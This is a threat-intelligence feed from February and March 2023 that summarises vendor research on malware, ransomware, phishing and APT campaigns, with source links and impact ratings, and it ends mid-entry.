- Threat_Actors_Using_Microsoft_OneNote_for_Malicious_Campaigns
- Date of Scan:
- 2023-03-01
- Impact:
- LOW
- Summary:
- Researchers from Inquest have observed OneNote show that it has been featured in delivery chains for a number of malware threats and distributing multiple groups.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- BB17_Distribution_Qakbot_Activity
- Date of Scan:
- 2023-03-01
- Impact:
- LOW
- Summary:
- Researchers from SANS have identified an infection with a URL that is found on VirusTotal after pivoting on a search for BB17-tagged distribution URLs for Qakbot.
—
- Intel Source:
- ZScaler
- Intel Name:
- Snip3_Crypter_is_Back_With_New_TTPs
- Date of Scan:
- 2023-03-01
- Impact:
- LOW
- Summary:
- Researchers from Zscaler have identified the use of the crypter with new TTPs deploying RAT families including DcRAT and QuasarRAT targeting victims across multiple industry verticals such as healthcare, energy and utilities, and manufacturing via spear phishing emails with subject lines related to “tax statements” in order to lure victims into execution.
Source:
https://www.zscaler.com/blogs/security-research/snip3-crypter-reveals-new-ttps-over-time
—
- Intel Source:
- Symantec
- Intel Name:
- Hackers_From_Blackfly_Group_Targeting_Materials_Technology
- Date of Scan:
- 2023-03-01
- Impact:
- LOW
- Summary:
- Symantec researchers have identified the Blackfly espionage group (aka APT41, Winnti Group, Bronze Atlas) has continued to mount attacks against targets in Asia and recently targeted two subsidiaries of an Asian conglomerate, both of which operate in the materials and composites sector, suggesting that the group may be attempting to steal intellectual property.
—
- Intel Source:
- Sonatypa
- Intel Name:
- PyPI_Malicious_Packages_Dropping_Windows_Trojan_via_Dropbox
- Date of Scan:
- 2023-02-28
- Impact:
- LOW
- Summary:
- Researchers from Sonatype have observed hundreds of packages getting published and removed in batches on the PyPI registry. These packages, despite containing contextual terms like “libs,” “nvidiapaypalsuper,” and so on, are named quite arbitrarily.
—
- Intel Source:
- Team Cymru
- Intel Name:
- Chile_IP_Address_Connecting_to_IcedID_BackConnect_C2_Servers
- Date of Scan:
- 2023-02-28
- Impact:
- LOW
- Summary:
- Researchers from Team-Cymru have identified an IP address geolocation to Chile that is used to access various elements of the IcedID infrastructure.
Source:
https://www.team-cymru.com/post/from-chile-with-malware
—
- Intel Source:
- Cyble
- Intel Name:
- ChatGPT_Based_Phishing_Attacks
- Date of Scan:
- 2023-02-28
- Impact:
- MEDIUM
- Summary:
- Cyble researchers have detected several phishing websites that are being promoted through a fraudulent OpenAI social media page to spread various types of malware. Furthermore, several phishing sites are impersonating ChatGPT to steal credit card information.
Source:
https://blog.cyble.com/2023/02/22/the-growing-threat-of-chatgpt-based-phishing-attacks/
—
- Intel Source:
- Cofense
- Intel Name:
- Hackers_Abusing_Atlassian
- Date of Scan:
- 2023-02-28
- Impact:
- LOW
- Summary:
- Cofense researchers have observed a phishing campaign, under the guise of a payment remittance, taking advantage of custom URLs from Atlassian to redirect users to their phish.
Source:
https://cofense.com/blog/threat-actors-abuse-atlassian-bypass-multiple-secure-email-gateways-segs/
—
- Intel Source:
- ASEC
- Intel Name:
- Malicious_Emails_Impersonating_Shipping_Companies
- Date of Scan:
- 2023-02-28
- Impact:
- LOW
- Summary:
- Researchers from ASEC have discovered malicious emails impersonating shipping companies being distributed in Korea. These emails prompt users to open the attached file with the subject ‘Submitting import clearance info’.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- URL_Files_and_WebDAV_Using_For_IcedID_Infection
- Date of Scan:
- 2023-02-28
- Impact:
- LOW
- Summary:
- Researchers from SANS have observed that IcedID distribution patterns occasionally change and identified a distribution pattern using .url files and WebDAV traffic for an IcedID infection.
Source:
https://isc.sans.edu/diary/URL+files+and+WebDAV+used+for+IcedID+Bokbot+infection/29578/
—
- Intel Source:
- TrendMicro
- Intel Name:
- The_Investigation_of_PlugX_Trojan
- Date of Scan:
- 2023-02-28
- Impact:
- LOW
- Summary:
- TrendMicro researchers have discovered a file called x32dbg.exe is used to sideload a malicious DLL they identified as a variant of PlugX.
—
- Intel Source:
- Cyble
- Intel Name:
- Analysis_of_FortiNAC_Vulnerability_CVE_2022_39952
- Date of Scan:
- 2023-02-28
- Impact:
- LOW
- Summary:
- Cyble researchers have analyzed the vulnerability affecting multiple versions of FortiNAC. The affected product is widely used in mid to large-size enterprises involving state and private entities.
—
- Intel Source:
- CERT-UA
- Intel Name:
- Cyber_attacks_on_the_Ukrainian_state_organizations
- Date of Scan:
- 2023-02-28
- Impact:
- MEDIUM
- Summary:
- Researchers from CERT-UA have investigated the violation of the integrity and availability of the web resources of a number of state organizations.
—
- Intel Source:
- ASEC
- Intel Name:
- Magniber_Ransomware_is_Back_With_New_Technique
- Date of Scan:
- 2023-02-28
- Impact:
- LOW
- Summary:
- ASEC researchers have identified that Magniber ransomware is distributed as a Windows installer package file (.msi) in Edge and Chrome browsers.
—
- Intel Source:
- Symantec
- Intel Name:
- New_Hacking_Group_Clasiopa_Targeting_Materials_Research
- Date of Scan:
- 2023-02-27
- Impact:
- MEDIUM
- Summary:
- Symantec researchers have identified that an unknown threat actor targeting Materials research organizations in Asia with a distinct set of tools.
Source:
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/clasiopa-materials-research
—
- Intel Source:
- Crowdstrike & Jamf
- Intel Name:
- I2Pminer_Variant_Targeting_MacOS
- Date of Scan:
- 2023-02-27
- Impact:
- LOW
- Summary:
- CrowdStrike and Jamf researchers have analyzed a macOS-targeted mineware campaign that utilized malicious application bundles to deliver open source XMRig cryptomining software and Invisible Internet Protocol (I2P) network tooling.
—
- Intel Source:
- Bitdefender
- Intel Name:
- Hackers_Targeting_Multiple_ManageEngine_Products
- Date of Scan:
- 2023-02-27
- Impact:
- MEDIUM
- Summary:
-
Researchers from BitDefender have observed that multiple threat actors opportunistically weaponized a now-patched critical security vulnerability impacting several Zoho ManageEngine products since January 20, 2023.
Additional Blog link: https://www.bitdefender.com/blog/labs/weaponizing-pocs-a-targeted-attack-using-cve-2022-47966/
Source:
https://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966
—
- Intel Source:
- WeliveSecurity
- Intel Name:
- Lazarus_Group_Using_New_WinorDLL64_Backdoor
- Date of Scan:
- 2023-02-27
- Impact:
- MEDIUM
- Summary:
- Welivesecurity researchers have observed one of the payloads of the Wslink downloader that was discovered back in 2021. That payload WinorDLL64 based on its filename WinorDLL64.dll. Wslink, which had the filename WinorLoaderDLL64.dll, is a loader for Windows binaries that and runs as a server and executes received modules in memory.
Source:
https://www.welivesecurity.com/2023/02/23/winordll64-backdoor-vast-lazarus-arsenal/
—
- Intel Source:
- Checkmarx
- Intel Name:
- NPM_Packages_Distributing_Phishing_Links
- Date of Scan:
- 2023-02-24
- Impact:
- LOW
- Summary:
- Checkmarx researchers have investigated and uncovered a recurring attack method, in which cyber attackers utilize spamming techniques to flood the open-source ecosystem with packages that include links to phishing campaigns in their README.md files.
Source:
https://checkmarx.com/blog/how-npm-packages-were-used-to-spread-phishing-links/
—
- Intel Source:
- ASEC
- Intel Name:
- Hackers_Targeting_Innorix_Agent_Vulnerable_Versions
- Date of Scan:
- 2023-02-23
- Impact:
- LOW
- Summary:
- Researchers from ASEC have discovered the distribution of malware targeting users with vulnerable versions of Innorix Agent and the collected malware is a backdoor that attempts to connect to a C&C server.
—
- Intel Source:
- Reversing Labs
- Intel Name:
- PyPI_Packages_Mimicking_Popular_Libraries
- Date of Scan:
- 2023-02-23
- Impact:
- LOW
- Summary:
- Reversing Labs researchers are warning of “imposter packages” mimicking popular libraries available on the Python Package Index (PyPI) repository. The 41 malicious PyPI packages have been found to pose as typosquatted variants of legitimate modules such as HTTP, AIOHTTP, requests, urllib, and urllib3.
Source:
https://www.reversinglabs.com/blog/beware-impostor-http-libraries-lurk-on-pypi
—
- Intel Source:
- Varonis
- Intel Name:
- The_New_Version_of_HardBit_2_0_Ransomware
- Date of Scan:
- 2023-02-23
- Impact:
- LOW
- Summary:
- Researchers from Varonis have identified the new version of HardBit ransomware which is HardBit 2.0 and it is still under development and features unique capabilities.
—
- Intel Source:
- Zscaler
- Intel Name:
- Techniques_Analysis_of_Rhadamanthys_information_stealer
- Date of Scan:
- 2023-02-23
- Impact:
- LOW
- Summary:
- Zscaler researchers have analyzed Rhadamanthys, an information stealer. The malware implements complex anti-analysis techniques by using a public open source library. It is written in C++ and being distributed mostly via malicious Google advertisements. The malware is designed to steal credentials from web browsers, VPN clients, email clients and chat clients as well as cryptocurrency wallets.
—
- Intel Source:
- ASEC
- Intel Name:
- Lazarus_Group_Leveraging_Anti_Forensic_Techniques
- Date of Scan:
- 2023-02-23
- Impact:
- LOW
- Summary:
- ASEC researchers have shared the anti-forensic traces and details found in the systems that were infiltrated by the Lazarus group.
—
- Intel Source:
- Sekoia
- Intel Name:
- A_New_InfoStealer_Stealc
- Date of Scan:
- 2023-02-23
- Impact:
- LOW
- Summary:
- Sekoia researchers have identified a new info stealer while routine Dark Web monitoring. The information stealer is advertised as Stealc by its alleged developer, going by the handle Plymouth. Also, the threat actor presents Stealc as a fully featured and ready-to-use stealer, whose development relied on Vidar, Raccoon, Mars, and Redline stealers.
—
- Intel Source:
- Mawarebytes
- Intel Name:
- Credit_Card_Skimmers_Targeting_Ecommerce_Platforms
- Date of Scan:
- 2023-02-23
- Impact:
- LOW
- Summary:
- Researchers from Malwarebytes have observed credit card skimmers targeting e-commerce platforms such as Magento and WordPress/WooCommerce.
—
- Intel Source:
- Sentinelone
- Intel Name:
- The_Investigation_of_8220_Gang_Cloud_Threat
- Date of Scan:
- 2023-02-23
- Impact:
- LOW
- Summary:
- SentinelOne researchers have analyzed the 8220 gang cloud threat as the group has again switched to new infrastructure and samples.
—
- Intel Source:
- Sucuri
- Intel Name:
- Attackers_Leveraging_Cron_Jobs_to_Infect_Websites
- Date of Scan:
- 2023-02-23
- Impact:
- LOW
- Summary:
- Sucuri researchers have observed attackers using malicious corn jobs quite frequently to reinfect websites. Recently, they have seen a distinctive new wave of these infections.
Source:
https://blog.sucuri.net/2023/02/attackers-abuse-cron-jobs-to-reinfect-websites.html
—
- Intel Source:
- ASEC
- Intel Name:
- HWP_Malware_Using_the_Steganography_Technique
- Date of Scan:
- 2023-02-22
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered that the RedEyes threat group is distributing malware by exploiting the HWP EPS (Encapsulated PostScript) vulnerability (CVE-2017-8291).
—
- Intel Source:
- SocInvestigation
- Intel Name:
- Return_of_Redline_Stealer
- Date of Scan:
- 2023-02-22
- Impact:
- LOW
- Summary:
- SOC Investigation reserachers discussed in their blog the Redline Stealer malware, the background, its capabilities, and its impact, the basic steps of the malware outlines.
Source:
https://www.socinvestigation.com/redline-stealer-returns-with-new-ttps-detection-response/
—
- Intel Source:
- Quickheal
- Intel Name:
- Raccoon_Stealer_V2_Using_Microsoft_Add_Ins_to_Delivering_Malware
- Date of Scan:
- 2023-02-22
- Impact:
- MEDIUM
- Summary:
- Researchers from QuickHeal have identified that Microsoft Add-Ins can present a potential threat vector for malware like Raccoon Stealer V2. These types of malware are designed to steal sensitive information from infected systems and use Microsoft Add-Ins as a means of delivering the malware to target systems.
Source:
https://blogs.quickheal.com/your-office-document-is-at-risk-xll-a-new-attack-vector/
—
- Intel Source:
- TrendMicro
- Intel Name:
- Expansion_of_attackes_on_Linux_ESXi_Servers_by_Royal_ransomware
- Date of Scan:
- 2023-02-22
- Impact:
- MEDIUM
- Summary:
- TrendMicro analysts analayzed that since last year that ransomware groups will would increasingly target Linux servers and embedded systems in the coming years after detecting a double-digit year-on-year (YoY) increase in attacks on these systems. Royal ransomware is a new variant targeting Linux systems emerged and TrendMicro shared their technical analysis on this variant in their blog.
—
- Intel Source:
- Symantec
- Intel Name:
- A_new_threat_group_Hydrochasma_targets_organizations_in_Asia
- Date of Scan:
- 2023-02-22
- Impact:
- LOW
- Summary:
- Researchers from Symantec have observed a new threat group Hydrochasma attacking shipping companies and medical laboratories in Asia. Hydrochasma has not been linked to any previously identified group, but appears to have a possible interest in industries that may be involved in COVID-19-related treatments or vaccines. And possible infection vector used by Hydrochasma was a phishing email.
—
- Intel Source:
- SecuronixThreatLabs
- Intel Name:
- STL_Investigation_222
- Date of Scan:
- 2023-02-22
- Impact:
- LOW
- Summary:
- Indicators of Compromise related to a Securonix Threat Labs investigation
—
- Intel Source:
- Cyble
- Intel Name:
- Qakbot_Distributing_via_OneNote
- Date of Scan:
- 2023-02-22
- Impact:
- LOW
- Summary:
- Cyble researchers have identified multiple distribution methods for the widely known banking trojan Qakbot and these methods include using malspam with OneNote attachments, malspam with zip files containing WSF, and others.
—
- Intel Source:
- Cyble
- Intel Name:
- The_Examination_of_DarkCloud_Stealer
- Date of Scan:
- 2023-02-22
- Impact:
- LOW
- Summary:
- Cyble researchers have observed an increase in the prevalence of DarkCloud Stealer, with Threat Actors employing various spam campaigns to disseminate this malware worldwide.
Source:
https://blog.cyble.com/2023/02/20/decoding-the-inner-workings-of-darkcloud-stealer/
—
- Intel Source:
- Securityscorecard
- Intel Name:
- VMWare_ESXi_Vulnerability_targeted_by_ESXiArgs_Ransomware
- Date of Scan:
- 2023-02-22
- Impact:
- MEDIUM
- Summary:
- After warning of a widespread ransomware campaign exploiting CVE-2021-21974, a VMWare ESXi vulnerability, The SecurityScorecard Threat Research Team started their analyses about this new campaign in response to the advisories and they discovered possible communication between target IP addresses and infrastructure involved in the exploitation of this vulnerability.
—
- Intel Source:
- Esentire
- Intel Name:
- Analysis_of_Icarus_Stealer
- Date of Scan:
- 2023-02-22
- Impact:
- LOW
- Summary:
- Esentire researchers have analyzed the Icarus stealer malware into the technical details of how the malware operates and security recommendations to protect the organization from being exploited.
Source:
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-icarus-stealer
—
- Intel Source:
- ThreatMon
- Intel Name:
- ReverseRAT_Backdoor_Targeting_Indian_Government_Agencies
- Date of Scan:
- 2023-02-22
- Impact:
- MEDIUM
- Summary:
- Researchers from ThreatMon have observed a spear-phishing campaign targeting Indian government entities that aim to deploy an updated version of a backdoor called ReverseRAT.
Source:
https://threatmon.io/apt-sidecopy-targeting-indian-government-entities/
—
- Intel Source:
- TrendMicro
- Intel Name:
- Royal_Ransomware_Targeting_Linux_ESXi_Servers
- Date of Scan:
- 2023-02-21
- Impact:
- MEDIUM
- Summary:
- TrendMicro researchers have observed that Royal ransomware expanding its targets by increasingly developing Linux-based versions.
—
- Intel Source:
- Fortinet
- Intel Name:
- The_Deep_Examination_of_CatB_Ransomware
- Date of Scan:
- 2023-02-21
- Impact:
- LOW
- Summary:
- Fortinet researchers have analyzed the CatB ransomware. It is a reasonably new entrant to the ransomware field, with samples only dating back to December 2022.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-catb-ransomware
—
- Intel Source:
- Sucuri
- Intel Name:
- The_Dangers_of_Installing_Nulled_WordPress_Themes_and_Plugins
- Date of Scan:
- 2023-02-20
- Impact:
- LOW
- Summary:
- Researchers from Sucuri have identified installing nulled themes or plugins on the website is not only participating in software theft but can also introduce serious risks including malware, SEO spam, and website backdoors.
Source:
https://blog.sucuri.net/2023/02/the-dangers-of-installing-nulled-wordpress-themes-and-plugins.html
—
- Intel Source:
- Malwarebytes
- Intel Name:
- WordPress_Sites_Backdoored_With_Ad_Fraud_Plugin
- Date of Scan:
- 2023-02-20
- Impact:
- LOW
- Summary:
- Malwarebytes researchers have identified around 50 WordPress blogs that have been backdoored with a plugin called fuser-master.
—
- Intel Source:
- SecurityScoreCard
- Intel Name:
- BlackCat_Ransomware_Group_Targeting_Healthcare_Service_Provider
- Date of Scan:
- 2023-02-20
- Impact:
- LOW
- Summary:
- Security ScoreCard researchers have observed BlackCat ransomware group adding an entry for an electronic health record (EHR) vendor to its extortion site.
—
- Intel Source:
- Eclecticiq
- Intel Name:
- Hackers_Targeting_Security_Service_of_Ukraine_and_NATO_Allies
- Date of Scan:
- 2023-02-20
- Impact:
- LOW
- Summary:
- EclecticIQ researchers have observed multiple weaponized phishing emails probably targeting the Security Service of Ukraine (SSU), NATO allies like Latvia, and private companies such as Culver Aviation.
—
- Intel Source:
- Sentilone
- Intel Name:
- A_new_threat_cluster_WIP26
- Date of Scan:
- 2023-02-19
- Impact:
- MEDIUM
- Summary:
- SentinelLabs has observed a threat activity tracked as WIP26. This threat actor has been targeting telecommunication companies in the Middle East. WIP26 is known by abusing of public Cloud infrastructure – Microsoft 365 Mail, Microsoft Azure, Google Firebase, and Dropbox – for malware delivery, data exfiltration, and C2 purposes.
—
- Intel Source:
- ASEC
- Intel Name:
- Analysis_of_distribution_sites_of_Magniber_ransomware_using_EDR
- Date of Scan:
- 2023-02-18
- Impact:
- LOW
- Summary:
- ASEC researchers have identified that Magniber ransomware distribution is continued and tracking the distribution site URL through a different method.
—
- Intel Source:
- Yoroi
- Intel Name:
- From_Targeting_Attacks_to_widespread_Usage_of_Brute_Ratel
- Date of Scan:
- 2023-02-18
- Impact:
- LOW
- Summary:
- Researchers from Yoroi have identified and tracked security threats that involve actively searching for and analyzing potential security breaches or anomalies in an organization’s systems and networks.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Earth_Kitsune_Delivering_New_WhiskerSpy_Backdoor
- Date of Scan:
- 2023-02-18
- Impact:
- LOW
- Summary:
- TrendMicro researchers have discovered a new backdoor which they have attributed to the APT group known as Earth Kitsune. Since 2019, Earth Kitsune has been distributing variants of self-developed backdoors to targets, primarily individuals who are interested in North Korea.
Source:
https://www.trendmicro.com/en_us/research/23/b/earth-kitsune-delivers-new-whiskerspy-backdoor.html
—
- Intel Source:
- Blackberry
- Intel Name:
- DarkBit_Ransomware_Targeting_Israel
- Date of Scan:
- 2023-02-18
- Impact:
- MEDIUM
- Summary:
- BlackBerry researchers have identified a new ransomware strain dubbed “DarkBit” that has recently appeared on the threat landscape after targeting one of Israel’s top research universities, Technion – Israel Institute of Technology (IIT).
Source:
https://blogs.blackberry.com/en/2023/02/darkbit-ransomware-targets-israel
—
- Intel Source:
- ASEC
- Intel Name:
- Hackers_From_RedEyes_Using_New_Malware_to_Steal_Data
- Date of Scan:
- 2023-02-17
- Impact:
- LOW
- Summary:
- ASEC researchers have identified that the APT37 threat group using a new evasive ‘M2RAT’ malware and steganography to target individuals for intelligence collection.
—
- Intel Source:
- Symantec
- Intel Name:
- New_Malware_Abusing_Microsoft_IIS_Feature_to_Establish_Backdoor
- Date of Scan:
- 2023-02-17
- Impact:
- MEDIUM
- Summary:
- Researchers from Symantec have observed a new malware that abuses a feature of Microsoft’s Internet Information Services (IIS) to deploy a backdoor onto targeted systems.
Source:
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/frebniis-malware-iis
—
- Intel Source:
- Lookout
- Intel Name:
- Dark_Caracal_APT_Back_with_New_Version_of_Bandook_Spyware
- Date of Scan:
- 2023-02-17
- Impact:
- MEDIUM
- Summary:
- Researchers from Lookout have discovered that the Dark Caracal APT is currently using a new version of Bandook spyware to target Windows systems.
Source:
https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf
—
- Intel Source:
- TrendMicro
- Intel Name:
- Earth_Yako_Group_is_Back
- Date of Scan:
- 2023-02-17
- Impact:
- LOW
- Summary:
- Researchers from TrendMicro have investigated several incidents and observed the intrusion set introduced new tools and malware within a short period of time, frequently changing and expanding its attack targets. Security researchers believe that Earth Yako is still active and will keep targeting more organizations soon.
—
- Intel Source:
- Trellix
- Intel Name:
- ESXiArgs_Ransomware_Leveraging_Two_Year_Old_Vulnerability
- Date of Scan:
- 2023-02-17
- Impact:
- LOW
- Summary:
- Trellix researchers have identified that Global ESXiArgs ransomware is attacking the back of a two-year-old vulnerability. The vulnerability ransomware actors targeted is CVE-2021-21974 and allows an attacker to exploit the OpenSLP protocol if the affected server is exposed to the internet.
—
- Intel Source:
- Morphisec
- Intel Name:
- Malware_Campaign_Delivering_ProxyShellMiner_to_Windows_Endpoints
- Date of Scan:
- 2023-02-17
- Impact:
- MEDIUM
- Summary:
- Morphisec researchers have identified a highly evasive malware campaign delivering ProxyShellMiner to Windows endpoints. ProxyShellMiner exploits the ProxyShell vulnerabilities CVE-2021-34473 and CVE-2021-34523 in Windows Exchange servers for initial access and compromise of an organization to deliver crypto miners.
—
- Intel Source:
- Sentinelone
- Intel Name:
- The_Analysis_of_TZW_Ransomware
- Date of Scan:
- 2023-02-17
- Impact:
- LOW
- Summary:
- SentinelOne researchers have deeply analyzed the TZW ransomware. Also, observed TZW ransomware linked to a known malware family called GlobeImposter (sometimes referred to as LOLNEK or LOLKEK).
—
- Intel Source:
- PaloAlto
- Intel Name:
- Mirai_Variant_V3G4_Targeting_IoT_Devices
- Date of Scan:
- 2023-02-17
- Impact:
- LOW
- Summary:
- Researchers from PaloAlto have observed a Mirai variant called V3G4, is leveraging several vulnerabilities to spread itself. Once the vulnerable devices are compromised, they will be fully controlled by attackers and become a part of the botnet.
Source:
https://unit42.paloaltonetworks.com/mirai-variant-v3g4/
—
- Intel Source:
- Welivesecurity
- Intel Name:
- Trojanized_Installers_Targeting_Southeast_and_East_Asia
- Date of Scan:
- 2023-02-17
- Impact:
- LOW
- Summary:
- ESET researchers have identified a campaign using trojanized installers to deliver the FatalRAT malware, distributing via malicious websites linked in ads that appear in Google search results.
Source:
https://www.welivesecurity.com/2023/02/16/these-arent-apps-youre-looking-for-fake-installers/
—
- Intel Source:
- Cyble
- Intel Name:
- Diving_Deep_into_DarkBit_Ransomware
- Date of Scan:
- 2023-02-16
- Impact:
- LOW
- Summary:
- Cyble researchers have recently detected a sample of the DarkBit ransomware and analyzed its details.
Source:
https://blog.cyble.com/2023/02/15/uncovering-the-dark-side-of-darkbit-ransomware/
—
- Intel Source:
- ASEC
- Intel Name:
- Malware_Targeting_Security_Related_Workers
- Date of Scan:
- 2023-02-16
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered that the malware is distributed to broadcasting and ordinary companies as well as those in the security-related field.
—
- Intel Source:
- SecurityScoreCard
- Intel Name:
- US_Public_Housing_Authority_ransomware_attack
- Date of Scan:
- 2023-02-16
- Impact:
- LOW
- Summary:
- U.S. Public Housing Authority has announced a disruption, but has not elaborated on the nature of the event. The LockBit ransomware group, which has made false claims in the past, took responsibility for the incident.
—
- Intel Source:
- ZScaler
- Intel Name:
- A_new_Havoc_campaign_targeting_a_Government_organization
- Date of Scan:
- 2023-02-16
- Impact:
- LOW
- Summary:
- Zscaler ThreatLabz research team observed a new campaign called Havoc which is targeting a Government organization.The threat actors have been using a new Command & Control (C2) framework named Havoc. The team provoded the technical analysis and overview of recently discovered attack campaign targeting government organization using Havoc and reveals how it can be leveraged by the threat actors in various campaigns.
Source:
https://www.zscaler.com/blogs/security-research/havoc-across-cyberspace
—
- Intel Source:
- ASEC
- Intel Name:
- LockBit_2_0_Ransomware_is_Back
- Date of Scan:
- 2023-02-16
- Impact:
- MEDIUM
- Summary:
- ASEC researchers have identified that Lockbit 2.0 is being distributed in a MalPE format instead of the NSIS format.
—
- Intel Source:
- DOCGuard
- Intel Name:
- Microsoft_OneNote_Sample_Targeting_Cisco_VPN
- Date of Scan:
- 2023-02-16
- Impact:
- LOW
- Summary:
- Researchers from DOCGuard have identified that the Microsoft OneNote sample targeting Cisco VPN users bypasses all the antiviruses.
Source:
https://twitter.com/doc_guard/status/1625872935595507713
—
- Intel Source:
- ASEC
- Intel Name:
- Paradise_Ransomware_Distributing_Through_AweSun_Vulnerability_Exploitation
- Date of Scan:
- 2023-02-16
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered the distribution of Paradise ransomware and the threat actors are suspected to be utilizing vulnerability exploitation of the Chinese remote control program AweSun.
—
- Intel Source:
- Minerva Labs
- Intel Name:
- New_Malware_That_Can_Fly_Under_the_Radar
- Date of Scan:
- 2023-02-15
- Impact:
- LOW
- Summary:
- Researchers from Minerva Labs have identified a new piece of evasive malware dubbed Beep that’s designed to fly under the radar and drop additional payloads onto a compromised host.
Source:
https://minerva-labs.com/blog/beepin-out-of-the-sandbox-analyzing-a-new-extremely-evasive-malware/
—
- Intel Source:
- Cyble
- Intel Name:
- Turkish_Earthquake_Leads_to_Fake_Donation_Schemes
- Date of Scan:
- 2023-02-15
- Impact:
- MEDIUM
- Summary:
- Researchers from Cyble have discovered various domains and IP addresses hosting websites that claim to be collecting funds to aid those affected by the earthquake in Turkey and Syria.
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_Tofsee_Malware
- Date of Scan:
- 2023-02-15
- Impact:
- LOW
- Summary:
- Researchers from Rewterz have identified the active IOCs of Tofsee Malware. It has been around since 2016. Once installed on a compromised computer, it can be used to send spam emails and gather user data.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alerts-tofsee-malware-active-iocs
—
- Intel Source:
- ASEC
- Intel Name:
- Pybot_DDoS_Distributing_With_Illegal_Software
- Date of Scan:
- 2023-02-15
- Impact:
- LOW
- Summary:
- ASEC researchers have monitoring malware that is being distributed through illegal software like software cracks or serial keygens and recently discovered Pybot DDoS being distributed with illegal software.
—
- Intel Source:
- BitDefender
- Intel Name:
- A_Deep_Investigation_of_VMware_ESXi_Servers_Vulnerability
- Date of Scan:
- 2023-02-15
- Impact:
- LOW
- Summary:
- BitDefender researchers have investigated the VMware ESXi servers vulnerability which was targeted by Opportunistic Threat Actors and advised users to patch it immediately.
—
- Intel Source:
- ASEC
- Intel Name:
- Qakbot_Malware_Distributing_via_OneNote
- Date of Scan:
- 2023-02-15
- Impact:
- LOW
- Summary:
- Researchers from ASEC have identified that Qakbot stopped using MS Office Macro, their past distribution method, and instead started to use OneNote to execute their malware.
—
- Intel Source:
- CERT-UA
- Intel Name:
- Hackers_Targeting_Ukraine_Using_Remote_Utility_Program
- Date of Scan:
- 2023-02-14
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have identified a cyber attack on organizations and institutions in Ukraine using the Remote Utilities program.
—
- Intel Source:
- Group-IB
- Intel Name:
- Hackers_From_ChinaTargeting_GroupIB_Cybersecurity_Firm
- Date of Scan:
- 2023-02-14
- Impact:
- MEDIUM
- Summary:
- Group-IB researchers have identified that an APT group known as Tonto Team has tried targeting the Singapore-based Group-IB cybersecurity firm for the second time.
—
- Intel Source:
- BitSight
- Intel Name:
- Diving_Deep_into_Mylobot
- Date of Scan:
- 2023-02-14
- Impact:
- LOW
- Summary:
- BitSight researchers have analyzed the Mylobot malware and focused on its main capability, which is transforming the infected system into a proxy.
Source:
https://www.bitsight.com/blog/mylobot-investigating-proxy-botnet
—
- Intel Source:
- ASEC
- Intel Name:
- AsyncRAT_Leveraging_Windows_Help_File
- Date of Scan:
- 2023-02-13
- Impact:
- LOW
- Summary:
- ASEC researchers have identified that AsyncRAT is distributing as a Windows help file (*.chm).
—
- Intel Source:
- Reversing Labs
- Intel Name:
- Malicious_Npm_Package_Using_Typosquatting_to_Download_Malware
- Date of Scan:
- 2023-02-13
- Impact:
- LOW
- Summary:
- Reversing Labs researchers have observed a package called “aabquerys” is spotted on the open-source JavaScript npm repository using typosquatting techniques to enable the download of malicious components.
Source:
https://www.reversinglabs.com/blog/open-source-malware-sows-havoc-on-supply-chain
—
- Intel Source:
- Fortinet
- Intel Name:
- Supply_Chain_Attack_by_New_Malicious_Python_Package
- Date of Scan:
- 2023-02-13
- Impact:
- LOW
- Summary:
- FortiGate researchers have identified five malicious packages on the Python Package Index (PyPI), stealing passwords, Discord authentication cookies, and cryptocurrency wallets from unsuspecting developers.
—
- Intel Source:
- Huntress
- Intel Name:
- The_Clop_Ransomware_Claims_to_Have_Breached_130_Organizations
- Date of Scan:
- 2023-02-13
- Impact:
- MEDIUM
- Summary:
- Researchers from Huntress have identified that Clop ransomware gang claims to be behind recent attacks that exploited a zero-day vulnerability in the GoAnywhere MFT secure file transfer tool, saying they stole data from over 130 organizations.
Source:
https://www.huntress.com/blog/investigating-intrusions-from-intriguing-exploits
—
- Intel Source:
- ASEC
- Intel Name:
- Hackers_From_Dalbit_Group_Targeting_Vulnerable_Korean_Company_Servers
- Date of Scan:
- 2023-02-13
- Impact:
- LOW
- Summary:
- ASEC researchers have identified that the Chinese threat actor group named Dalbit (m00nlight) is targeting vulnerable Korean company servers. Also, this group uses publicly available tools, from the WebShell used in the early stages to the ransomware used at the end.
—
- Intel Source:
- ASEC
- Intel Name:
- Website_posing_as_Naver_login_page
- Date of Scan:
- 2023-02-13
- Impact:
- LOW
- Summary:
- ASEC researchers have observed a situation where a fake Kakao login page is used to steal the account credentials of certain individuals.
—
- Intel Source:
- CISA
- Intel Name:
- DPRK_Malicious_Cyber_Activities
- Date of Scan:
- 2023-02-12
- Impact:
- MEDIUM
- Summary:
- This cybersecurity advisory provides an overview of Democratic People’s Republic of Korea (DPRK), state-sponsored ransomware and their TTPs and IOCs DPRK cyber actors used to gain access to and conduct ransomware attacks against Healthcare and Public Health (HPH) Sector organizations and other critical infrastructure sector entities, as well as DPRK cyber actors’ use of cryptocurrency to demand ransoms.
—
- Intel Source:
- Sentinelone
- Intel Name:
- Malicious_Google_Ads_Targeting_AWS_Login
- Date of Scan:
- 2023-02-10
- Impact:
- LOW
- Summary:
- SentinelOne researchers have identified a new phishing campaign targeting Amazon Web Services (AWS) logins is abusing Google ads to sneak phishing sites into Google Search to steal login credentials.
Source:
https://www.sentinelone.com/blog/cloud-credentials-phishing-malicious-google-ads-target-aws-logins/
—
- Intel Source:
- CISA
- Intel Name:
- Ransomware_Attac_on_Critical_Infrastructure_Funded_by_DPRK
- Date of Scan:
- 2023-02-10
- Impact:
- LOW
- Summary:
- CISA researchers have identified TTPs and IOCs DPRK cyber actors using to gain access to and conduct ransomware attacks against Healthcare and Public Health Sector organizations and other critical infrastructure sector entities, as well as DPRK cyber actors’ use of cryptocurrency to demand ransoms.
—
- Intel Source:
- SpiderLabs Blog
- Intel Name:
